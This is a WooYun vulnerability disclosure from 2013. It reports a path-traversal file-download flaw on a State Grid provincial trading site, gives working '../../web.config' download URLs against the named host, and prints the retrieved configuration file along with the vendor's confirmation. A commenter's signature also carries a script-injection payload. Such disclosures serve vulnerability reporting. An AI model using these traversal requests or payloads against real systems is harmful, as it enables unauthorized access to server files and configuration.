当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040898

漏洞标题:国家电网某分站任意文件下载漏洞

相关厂商:国家电网公司

漏洞作者: xlz0iza1

提交时间:2013-10-24 15:05

修复时间:2013-12-08 15:06

公开时间:2013-12-08 15:06

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-24: 细节已通知厂商并且等待厂商处理中
2013-10-25: 厂商已经确认,细节仅向厂商公开
2013-11-04: 细节向核心白帽子及相关领域专家公开
2013-11-14: 细节向普通白帽子公开
2013-11-24: 细节向实习白帽子公开
2013-12-08: 细节向公众公开

简要描述:

国家电网某分站任意文件下载漏洞

详细说明:

#1:国家电网交易信息发布网站存在任意文件下载漏洞。
网站地址:http://jyxx.ah.sgcc.com.cn
#2:电力交易年报下载地址

<a id="rptDljynb_ctl02_lbTitle" class="content2" href="javascript:__doPostBack('rptDljynb$ctl02$lbTitle','')" onclick="javascript:window.location.href=&apos;DownPdf.aspx?name=2008_2009-08-30.pdf&apos;;return false;"> … </a>


#3:构建下载地址
http://jyxx.ah.sgcc.com.cn/Downpdf.aspx?name=../../index.aspx
http://jyxx.ah.sgcc.com.cn/Downpdf.aspx?name=../../web.config
可以任意下载服务器上的文件夹。

漏洞证明:

Downpdf.aspx会自动把下载的文件后缀格式改成pdf只需该回来就可以了哦。

QQ图片20131024145413.jpg


QQ图片20131024145534.jpg


web.config配置文件信息

<?xml version="1.0"?>
<!--
注意: 除了手动编辑此文件以外,您还可以使用
Web 管理工具来配置应用程序的设置。可以使用 Visual Studio 中的
“网站”->“Asp.Net 配置”选项。
设置和注释的完整列表在
machine.config.comments 中,该文件通常位于
\Windows\Microsoft.Net\Framework\v2.x\Config 中
-->
<configuration>
<connectionStrings>
<add name="DataBaseKey" connectionString="Data Source=test;Password=test;User ID=Test;Location=127.0.0.1;Port=3306;"/>
</connectionStrings>
<system.web>
<authentication mode="Forms">
<forms name=".ASPXUSERDEMO" loginUrl="login.aspx" protection="All" path="/" timeout="60"/>
</authentication>
<!--<authorization>
<deny users="?"/>
</authorization>-->
<globalization requestEncoding="UTF-8" responseEncoding="UTF-8"/>
<compilation debug="true">
<assemblies>
<add assembly="Microsoft.JScript, Version=8.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/></assemblies></compilation>
</system.web>
<location path="Manage">
<system.web>
<authorization>
<deny users="?"/>
</authorization>
</system.web>
</location>
<location path="web/index.aspx">
<system.web>
<authorization>
<deny users="?"/>
</authorization>
</system.web>
</location>
<location path="web/nofile.asp">
<system.web>
<authorization>
<deny users="?"/>
</authorization>
</system.web>
</location>
<location path="web/frame_nofile.asp">
<system.web>
<authorization>
<deny users="?"/>
</authorization>
</system.web>
</location>
<location path="scdt.aspx">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="MarketDetail.aspx">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="dljynb.aspx">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="tpxw.aspx">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="DownPdf.aspx">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="ImageNewsDetail.aspx">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="documents">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>

<location path="dwjgt.htm">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="jyxx.htm">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="scdt.htm">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="jyzxjj.htm">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="css.css">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="flgc.htm">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="yxqk.htm">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<location path="images">
<system.web>
<authorization>
<allow users="*"></allow>
</authorization>
</system.web>
</location>
<system.codedom>
</system.codedom>
<system.webServer>
</system.webServer>
</configuration>

修复方案:

你懂的,今天没有冒泡了,出来冒下泡,嘎嘎!

版权声明:转载请注明来源 xlz0iza1@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-10-25 10:21

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-29 18:52 | xlz0iza1 ( 普通白帽子 | Rank:1027 漏洞数:207 | "><script/src=data:,alert(1)%2b")

    @国家电网公司 礼物撒时候发啊.

  2. 2013-10-31 15:32 | 国家电网公司(乌云厂商)

    @xlz0iza1 尚在申请中。。。